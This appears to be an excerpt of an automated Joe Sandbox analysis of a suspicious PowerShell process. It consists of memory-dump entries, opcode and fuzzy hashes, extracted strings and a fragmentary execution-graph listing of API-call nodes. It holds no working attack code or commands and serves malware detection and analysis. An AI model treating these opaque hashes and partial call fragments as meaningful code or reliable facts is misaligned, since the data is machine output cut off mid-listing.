                                            • Source File: 00000001.00000002.3348028471.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2d0d000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348028471.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2d0d000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348028471.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2d0d000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af5c717010153c04b43706859be5afedccb416ae9d58ecc9ba54aea41954bd4e
                                            • Instruction ID: 8d2e2460859e45baf848f76f555b5b1e79d45670250819554a7095b67d11bc7b
                                            • Opcode Fuzzy Hash: af5c717010153c04b43706859be5afedccb416ae9d58ecc9ba54aea41954bd4e
                                            • Instruction Fuzzy Hash: 4F016D343419508F8B866B28A46847D7FF7EFD9251325449EE407C7392CE648C068B95
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d96e5384ba00d08364244cf0d6759ea4c17566fc2cda796089a9c316ed110ce
                                            • Instruction ID: 8c7ec93998e1f45d5a28cb0417e6f2e3f754c68418aa89c837c2238968282a23
                                            • Opcode Fuzzy Hash: 9d96e5384ba00d08364244cf0d6759ea4c17566fc2cda796089a9c316ed110ce
                                            • Instruction Fuzzy Hash: C9F0F6317002004BDF186A6E949466E77E7FBC9351F00853DD10E87390EF31AC0657A2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 566974c6a75431c3e946ff1c296e7fe9520c18df861aa3a7a24cfa0bcbfe2331
                                            • Instruction ID: 0f2e15330379de1ba5b5a97903cc205d75adc834bd458fe01de97eb1ce21fae8
                                            • Opcode Fuzzy Hash: 566974c6a75431c3e946ff1c296e7fe9520c18df861aa3a7a24cfa0bcbfe2331
                                            • Instruction Fuzzy Hash: D1F06D353409104F8B896B28A16847E3BE7EFD8651324405EE906C3381CE249C028B91
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e03e4dc5e1dae9300f02f92efb3adb8b5819b86a49509934ce9289812731bd16
                                            • Instruction ID: 337be35cd209bb4b90406924d7a2a09a6905ea0389581e142826ea411e09c8fd
                                            • Opcode Fuzzy Hash: e03e4dc5e1dae9300f02f92efb3adb8b5819b86a49509934ce9289812731bd16
                                            • Instruction Fuzzy Hash: 6EF062746052408FDB49CF28D481954BBF1EFC9218718C4EAD4098F727E631EC43DBA0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f3714855a5b097fbf6bba076ce4afd5ab4ffc6fbe9d35c1968351aa92506087
                                            • Instruction ID: ea24d2b242977ece831dfa119fa6996749c725b1a4cfc30e94fafe580cc12fa7
                                            • Opcode Fuzzy Hash: 0f3714855a5b097fbf6bba076ce4afd5ab4ffc6fbe9d35c1968351aa92506087
                                            • Instruction Fuzzy Hash: D6F0E2363092404BCB1A526D60945AE7FB6EBC6311714857ED04ECB393CE62480997A2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f717e14a36acaef80912e8c6928f7c4a0d62f6c2d2af4d10b15cd9492a02b1b
                                            • Instruction ID: d21e583a30525bfbd892cf37aebe1c1e31a31b217fdedcf71a3bc1ece05ab3d2
                                            • Opcode Fuzzy Hash: 3f717e14a36acaef80912e8c6928f7c4a0d62f6c2d2af4d10b15cd9492a02b1b
                                            • Instruction Fuzzy Hash: 64F01D36A00509AFCB05DFC8D9808EDFB76FF88320B248119E615A32A1C732AD62DB50
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75214f1c5612bb4b9a53f11ede49be29b59186c9befc7b9cd3ee95855008a162
                                            • Instruction ID: c5c6471e18f01bc3c7f1dc0657e113d0e746d45e95d83d952b0e40c1635efa35
                                            • Opcode Fuzzy Hash: 75214f1c5612bb4b9a53f11ede49be29b59186c9befc7b9cd3ee95855008a162
                                            • Instruction Fuzzy Hash: BAF0BD75A00119AFCB15DFDCD9808ADFB76FF88324B248559EA14A72A0C732AC51DB50
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f470ac3eb6b7cfc7b0ca7febc1f7820d66f0be241de78615f8259886233ce2c1
                                            • Instruction ID: 339f388b73bfeea673615cc8304a3df8e631e74afbc4d1213b0d6cfa8684e00f
                                            • Opcode Fuzzy Hash: f470ac3eb6b7cfc7b0ca7febc1f7820d66f0be241de78615f8259886233ce2c1
                                            • Instruction Fuzzy Hash: 31E0263530465487CB4D2B75A00C6EEBA5ADBD5721F00013EE50AC3382EF795805D3D9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb46b9f4fe5505d6f026fded79eb701cea3e05018ed62bdcdf40e78880314138
                                            • Instruction ID: f02586f4b2714120f3e9735d20a1f05aea50d7775fe3281b8dfce626b0e9f4ef
                                            • Opcode Fuzzy Hash: fb46b9f4fe5505d6f026fded79eb701cea3e05018ed62bdcdf40e78880314138
                                            • Instruction Fuzzy Hash: 35E0D8319041CDCACB49EBB9E0574FC7F70FE21211B00019ED507669A3EA20014ECF82
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac9c03cecfbd046144a75bb49bbbd0f10ee54b47db94dca7ce56b3d60b5957de
                                            • Instruction ID: c9f39dfad05b11b0e079401761dfb932c3909b9ce00b36414fcb6b66ac6ea443
                                            • Opcode Fuzzy Hash: ac9c03cecfbd046144a75bb49bbbd0f10ee54b47db94dca7ce56b3d60b5957de
                                            • Instruction Fuzzy Hash: BFE04F74D042459F8B80DFB894815EDFFF0EB5A210F2485AAC819D7211E7328613CFA1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                            • Instruction ID: 10825a5e605db1370b7c06a9e7e4ab308319de417855d727831608b6a67abd99
                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                            • Instruction Fuzzy Hash: 30D06270D042099F8784EFADC94156DFBF4EB59200F5485AA9919D7301F73156128BD1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5bfe9ff392169e722faa809f4d517eb06daac2714d23e57f58e68eb9b32f0240
                                            • Instruction ID: ecba4d59c36a4433088f1e7b4a60bd7e85e7c2bcb2c2af98df4c190c5675507c
                                            • Opcode Fuzzy Hash: 5bfe9ff392169e722faa809f4d517eb06daac2714d23e57f58e68eb9b32f0240
                                            • Instruction Fuzzy Hash: 66D06731A0410DCBCB88EBA5E95A4BDBBB4EB20201F40016DEA17921D1EA24295ADBC1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b07efe4ea2f6d747a99b9c16eaece292215742f841ffce623dc3670ab1e2bfc1
                                            • Instruction ID: db56177d8db25069b737d284c728ffe95b0bf5c99c9047fa4355d4c2f771ddaf
                                            • Opcode Fuzzy Hash: b07efe4ea2f6d747a99b9c16eaece292215742f841ffce623dc3670ab1e2bfc1
                                            • Instruction Fuzzy Hash: E4D01734A0420CCBCB88EFA5E44A96EBFB4EB54204F000168E90A93380EA302846DBC1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8fc632965fc5a2d5aa5827a808c7a340000c18b441ee07ee03c0bfb3c0d38b3c
                                            • Instruction ID: dbde001ce5136061092a68873f645d57de79bb6cf3b81d90dc4719fa97a89b8d
                                            • Opcode Fuzzy Hash: 8fc632965fc5a2d5aa5827a808c7a340000c18b441ee07ee03c0bfb3c0d38b3c
                                            • Instruction Fuzzy Hash: 9DA011B03000008BC200CA00C882800B320AB82208B28C888A8288F282CB23E8038A80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$XRkq$XRkq$XRkq$tPfq$tPfq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-2218299458
                                            • Opcode ID: 61c454c0196b6d8706d1e1d3f28796e5e7877b037d252284a5de728950099ec4
                                            • Instruction ID: dc11e5a7df581f4ab41ef9e61f2951cbfc7e956286584c19e13d5da3e8c8d542
                                            • Opcode Fuzzy Hash: 61c454c0196b6d8706d1e1d3f28796e5e7877b037d252284a5de728950099ec4
                                            • Instruction Fuzzy Hash: 0C022AB1710206DFCB348FA8C4646EF7BA2AF85310F14845BE9569B391DB31DD4ACBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ($4'fq$4'fq$d%lq$d%lq$d%lq$d%lq$tPfq$tPfq$x($$fq
                                            • API String ID: 0-799826672
                                            • Opcode ID: 4c70d722b5e86bc0c995c0109af0ef229c7e1bc38e5e28f0bd2c81c01e49b790
                                            • Instruction ID: e3fa0659d80a36a5ee96c2dd98771bbd66dcac1d0b6dadcc745cceb15a24e09e
                                            • Opcode Fuzzy Hash: 4c70d722b5e86bc0c995c0109af0ef229c7e1bc38e5e28f0bd2c81c01e49b790
                                            • Instruction Fuzzy Hash: 3F9138B17142669FCB259F68C8646EB7BA2EF85710F14845BE881CF391DB31DC41C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-2681546525
                                            • Opcode ID: 6e2001f94e60de9cfdd09cebf5845a123a09f686a5d700625c6650a033999889
                                            • Instruction ID: 3e5a36addf9046c527881adc8a37eeca775581498c5130f681fd3d7fbe38dfeb
                                            • Opcode Fuzzy Hash: 6e2001f94e60de9cfdd09cebf5845a123a09f686a5d700625c6650a033999889
                                            • Instruction Fuzzy Hash: 75123FB4A102199FCB24DB68C990BDBBBB2FF85304F1085D9D5096B781CB72AD85CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-766573554
                                            • Opcode ID: e402a983ac91bd3b7c1c20a27d5f6ac17da51eacd651e065121f22da8f36ed01
                                            • Instruction ID: c758958456d3101a7ce29885dcf0e9ffc1e327bbec57c9bed5870e525a2c7fbd
                                            • Opcode Fuzzy Hash: e402a983ac91bd3b7c1c20a27d5f6ac17da51eacd651e065121f22da8f36ed01
                                            • Instruction Fuzzy Hash: BCD13BB1B143468FCB269B7888617FB7BA6AF85200F1484ABD585CB792DA31CC45C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq
                                            • API String ID: 0-332123906
                                            • Opcode ID: 2f1e87292abc24aaa4daabf1dc99f3cc585ceb0864f67d3fcb779ae40cd2126c
                                            • Instruction ID: 75c5ba7765afff4bc2fa986bccb3bd9706fe694526790468e5045b3d1f84ea55
                                            • Opcode Fuzzy Hash: 2f1e87292abc24aaa4daabf1dc99f3cc585ceb0864f67d3fcb779ae40cd2126c
                                            • Instruction Fuzzy Hash: E8F148B2B042158FCB158FA898216FBBBB6EFC6210F1484ABD585CB791DB31DC45C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq
                                            • API String ID: 0-4070656019
                                            • Opcode ID: 080b1087f9dac2d28d2afa930e33bd18b0c33ee7e31f9b8f7e2a57d0e278a4a1
                                            • Instruction ID: 2a7aa67ccfc2e44b4ff804f88a286da935fb86b264577afb7ee65df2b7b2c7ec
                                            • Opcode Fuzzy Hash: 080b1087f9dac2d28d2afa930e33bd18b0c33ee7e31f9b8f7e2a57d0e278a4a1
                                            • Instruction Fuzzy Hash: 2B613AB17143458FDB258AB984216FB7BA7AFC2310F14846BE585CB7A1DA31CC45C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$TQkq$TQkq$tPfq$$fq$$fq$$fq
                                            • API String ID: 0-1114105955
                                            • Opcode ID: 7a6c90ae47ce99fe3ebc12aaa982082c3a80317908675ad30ce07bc2212624b4
                                            • Instruction ID: 9e3f7a72cb9b9a848a02ea955da0fa4b6dcf2d6f980c79e4d27abe69fad5d9fa
                                            • Opcode Fuzzy Hash: 7a6c90ae47ce99fe3ebc12aaa982082c3a80317908675ad30ce07bc2212624b4
                                            • Instruction Fuzzy Hash: CF51DFB0611266DFDF248E05C564BEB77A2BF42311F5888ABE8859F391C771DC81CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq$$fq
                                            • API String ID: 0-3915454692
                                            • Opcode ID: 463ae711fd0e0469bd8b26da27f08b605b1c854e376b619291ae812d4fe001dd
                                            • Instruction ID: cff4ea3c620d125f0f00fd7cb7762ed9a7ab322d3c60f8facedb212554616c0f
                                            • Opcode Fuzzy Hash: 463ae711fd0e0469bd8b26da27f08b605b1c854e376b619291ae812d4fe001dd
                                            • Instruction Fuzzy Hash: FC51E1F06102269FCB248F64C464BEBBBB6EF85650F59849BE8809F391D771DD40CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                            • API String ID: 0-3759051638
                                            • Opcode ID: 8ef02d325b1297c59c5f9077d4c4381b8f742f73bfc8302095bddf183327feeb
                                            • Instruction ID: 11585d471450cb50a9ed49629289803c39ffb6924222f38c2b19ebf3333f69f1
                                            • Opcode Fuzzy Hash: 8ef02d325b1297c59c5f9077d4c4381b8f742f73bfc8302095bddf183327feeb
                                            • Instruction Fuzzy Hash: E941A7F5B10226CBCB248EA984646FBB7E6AF85250F64847BC599CB341DB35CC42C761
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq
                                            • API String ID: 0-3104067135
                                            • Opcode ID: 3d659551b7bd24948f6fe2efe6dc7330878b8595247e313cb77e4b7e38e6b2a4
                                            • Instruction ID: 4189c94463cfe7863947280aa1bd7f7893275ea480a58ffb3790235aad0c8447
                                            • Opcode Fuzzy Hash: 3d659551b7bd24948f6fe2efe6dc7330878b8595247e313cb77e4b7e38e6b2a4
                                            • Instruction Fuzzy Hash: 5031C2B0B50225DFCB24DF68C458AABBBA2FF88B10F14844AE845AF351C771EC01CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPfq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-3108386057
                                            • Opcode ID: aedae19132bb79edd1134f4103c92a15bfbd211a159ce5a3eed141d0c7463452
                                            • Instruction ID: 4ac751afb6a1d0ea77d25910588eb57de3ac08ca63bf7049ecaea92247ec82e8
                                            • Opcode Fuzzy Hash: aedae19132bb79edd1134f4103c92a15bfbd211a159ce5a3eed141d0c7463452
                                            • Instruction Fuzzy Hash: 3A210B326612068FEB318E54CA40ABB77F5AF80BD0F144155E9149F399D771DD04C7D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPfq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-3108386057
                                            • Opcode ID: db03da5f4323e8ccfe43d6f6586d9cf7be6f967a9508a34c4d90998d3bfbe1a6
                                            • Instruction ID: 8b471436e9204a0065ec2719b1201d25f643b924f0d2044d875e041539728249
                                            • Opcode Fuzzy Hash: db03da5f4323e8ccfe43d6f6586d9cf7be6f967a9508a34c4d90998d3bfbe1a6
                                            • Instruction Fuzzy Hash: 062108326612069FEB218E55CA40AAB77F5AF80BD0F144055E9049F359C771D904C7D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ofq$(ofq$(ofq$(ofq
                                            • API String ID: 0-875029461
                                            • Opcode ID: 5b8f59f60fceb2eb0b524c65239f573e014a920f86d8752ad6f895448cd4514e
                                            • Instruction ID: 0dbcb2cbb8bfd31ce0aa1d5c1ddfdb7996a873931cec6d778e3ea43897929be4
                                            • Opcode Fuzzy Hash: 5b8f59f60fceb2eb0b524c65239f573e014a920f86d8752ad6f895448cd4514e
                                            • Instruction Fuzzy Hash: B2F1F1B1B04319DFCB258F68C8647EBBBA2AF85314F14846BE5958B291CB35DC41CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XRkq$XRkq$tPfq$$fq
                                            • API String ID: 0-1861106669
                                            • Opcode ID: ff2d0281c2891cdaab0ed60af113c3363f9f4ec27cff8f59d459f6ae96b5fb94
                                            • Instruction ID: c9d342cf3287d3c0131bcf605dcd474caca8f9b6c55bcf1de1732a04f5523d9b
                                            • Opcode Fuzzy Hash: ff2d0281c2891cdaab0ed60af113c3363f9f4ec27cff8f59d459f6ae96b5fb94
                                            • Instruction Fuzzy Hash: FE4192B1A00205DBCB34CF58C164AEAB7F2AF49710F19C49BE4A65B755C731DD49CB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $fq$$fq$$fq$$fq
                                            • API String ID: 0-2113499236
                                            • Opcode ID: 967e3602eb537a301f190e36628fc5ee6d7369ed89a70a6d211585acc5a58cd2
                                            • Instruction ID: acf11145a1d4eb6d70ee922fa21b49567b54517570b3d23bccb285a0f2f7acf6
                                            • Opcode Fuzzy Hash: 967e3602eb537a301f190e36628fc5ee6d7369ed89a70a6d211585acc5a58cd2
                                            • Instruction Fuzzy Hash: 312144F23503025BDF349AAA88607A7B69B9FC9711F24C82BA585CB781DE35CC41C3A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $fq$$fq$$fq$$fq
                                            • API String ID: 0-2113499236
                                            • Opcode ID: 644db312889f154447575cbd6efcad0b9fed53f98a3eeb12428ffdefbf108cc2
                                            • Instruction ID: 3c3689fe43b8a67bf4f6d6fdfd18f97ad2e77de0a208718fc6ab54d777a28e4e
                                            • Opcode Fuzzy Hash: 644db312889f154447575cbd6efcad0b9fed53f98a3eeb12428ffdefbf108cc2
                                            • Instruction Fuzzy Hash: F921E0F1A053468BCB328F6484602E7BBB4AF5A350F1885AFD8C487382D735CC45C7A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq
                                            • API String ID: 0-2206495126
                                            • Opcode ID: 143932365ee43006f888d1e2336c94285dd4fb67dff92931b33dc48d9f9066e3
                                            • Instruction ID: bde00e6d6f86dbdbae772b712bc7d9e80a505529e950dc2079aa689540265cec
                                            • Opcode Fuzzy Hash: 143932365ee43006f888d1e2336c94285dd4fb67dff92931b33dc48d9f9066e3
                                            • Instruction Fuzzy Hash: D201DF6170A3C58FC72B022808206A67FB79FC3650B2941DBC080CF3E7CE598C4A83A7

                                            Execution Graph

                                            Execution Coverage:6%
                                            Dynamic/Decrypted Code Coverage:9.2%
                                            Signature Coverage:3.5%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:64
38252->38187 38253->38247 38255 445e12 38261 445e6b 38255->38261 38265 40b2cc 27 API calls 38255->38265 38616 413fa6 _wcsicmp _wcsicmp 38256->38616 38260 409d1f 6 API calls 38257->38260 38263 445c37 38260->38263 38724 445093 23 API calls 38261->38724 38262 4456eb 38268 4456fd memset memset memset memset 38262->38268 38269 4457ea 38262->38269 38270 445389 259 API calls 38263->38270 38264 445b17 38697 40aebe 38264->38697 38272 445e33 38265->38272 38617 409c70 wcscpy wcsrchr 38268->38617 38620 413d29 38269->38620 38276 445c47 38270->38276 38277 409d1f 6 API calls 38272->38277 38274 445e7e 38278 445f67 38274->38278 38281 40b2cc 27 API calls 38276->38281 38282 445e47 38277->38282 38283 40b2cc 27 API calls 38278->38283 38279 445ab2 memset 38284 40b2cc 27 API calls 38279->38284 38286 445c53 38281->38286 38723 409b98 GetFileAttributesW 38282->38723 38288 445f73 38283->38288 38289 445aa1 38284->38289 38285 409c70 2 API calls 38290 44577e 38285->38290 38291 409d1f 6 API calls 38286->38291 38293 409d1f 6 API calls 38288->38293 38289->38264 38289->38279 38294 409d1f 6 API calls 38289->38294 38589 40add4 38289->38589 38594 445389 38289->38594 38603 40ae51 38289->38603 38295 409c70 2 API calls 38290->38295 38296 445c67 38291->38296 38292 445e56 38292->38261 38300 445e83 memset 38292->38300 38297 445f87 38293->38297 38294->38289 38298 44578d 38295->38298 38299 445389 259 API calls 38296->38299 38727 409b98 GetFileAttributesW 38297->38727 38298->38269 38305 40b2cc 27 API calls 38298->38305 38299->38164 38304 40b2cc 27 API calls 38300->38304 38303->38187 38303->38249 38307 445eab 38304->38307 38306 4457a8 38305->38306 38308 409d1f 6 API calls 38306->38308 38309 409d1f 6 API calls 38307->38309 38310 4457b8 38308->38310 38311 445ebf 38309->38311 38619 409b98 GetFileAttributesW 38310->38619 38313 40ae18 9 API calls 38311->38313 38321 445ef5 38313->38321 38314 4457c7 38314->38269 38316 4087b3 338 API calls 38314->38316 38315 40ae51 9 API calls 38315->38321 